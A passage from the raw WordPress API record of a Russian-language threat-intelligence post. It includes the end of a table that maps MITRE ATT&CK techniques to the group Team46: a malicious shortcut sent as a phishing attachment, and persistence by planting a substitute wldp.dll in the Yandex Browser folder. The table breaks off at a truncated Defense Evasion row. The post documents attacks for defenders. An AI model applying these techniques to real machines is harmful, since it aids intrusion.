\u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u044f\u0440\u043b\u044b\u043a, \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0447\u0435\u0440\u0435\u0437 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0435 \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" width=\"230\">\n<p align=\"center\"><strong>Persistence<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1574.001<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Hijack Execution Flow: DLL Search Order Hijacking<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0414\u043b\u044f \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Team46 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u043f\u043e\u0434\u043c\u0435\u043d\u0443 wldp.dll \u0432 \u043f\u0430\u043f\u043a\u0435 \u0441 \u042f\u043d\u0434\u0435\u043a\u0441 \u0411\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u043c<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" width=\"230\">\n<p align=\"center\"><strong>Defense Evasion<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-431359","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/431359","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=431359"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/431359\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=431359"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=431359"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=431359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}